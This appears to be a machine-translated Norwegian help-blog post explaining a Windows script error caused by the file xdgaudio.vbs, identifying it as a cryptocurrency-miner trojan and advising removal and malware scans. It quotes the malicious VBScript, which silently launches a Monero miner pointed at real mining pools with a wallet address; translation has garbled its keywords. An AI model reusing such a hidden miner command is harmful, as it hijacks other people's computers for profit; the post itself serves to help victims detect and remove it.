Hvis du mottar følgende feilmelding relatert til "xdgaudio.vbs" i systemet ditt, er datamaskinen din mest sannsynlig infisert.
Skript: C:\windows\xdgaudio.vbs
Linje: 3
Char: 1
Feil: Systemet finner ikke den spesifiserte filen.
Kode: 80070002
Kilde: (null)
Når det redigeres med Notisblokk, kan skriptet inneholde linjer som nedenfor:
Dim WShell. Sett WShell = CreateObject("WScript. Shell") WShell. Kjør "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv. App -p x -k -o stratum+tcp://mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJKg7 -p x", 0. Sett WShell = Ingenting
Dette ser absolutt ut som en CPU / cryptocurrency Miner-trojaner som ikke bare bremser datamaskinen din, men også kan utgjøre en sikkerhetstrussel. Skriptfilene c:\windows\xdgaudio.vbs
og c:\windows\servicecrsssr.vbs bør slettes. Det er ikke nok. Kjør en grundig skanning med Malwarebytes antimalware, og skann også med antivirusprogramvaren du bruker.For detaljerte instruksjoner om fjerning av slike Miner Trojan, sjekk ut malwaretips.com guide Slik fjerner du CPU Miner Trojan fra Windows (Hjelpeveiledning for virus).
En liten forespørsel: Hvis du likte dette innlegget, kan du dele dette?
En "liten" andel fra deg ville virkelig hjelpe mye med veksten av denne bloggen. Noen gode forslag:- Fest den!
- Del den på favorittbloggen din + Facebook, Reddit
- Tweet det!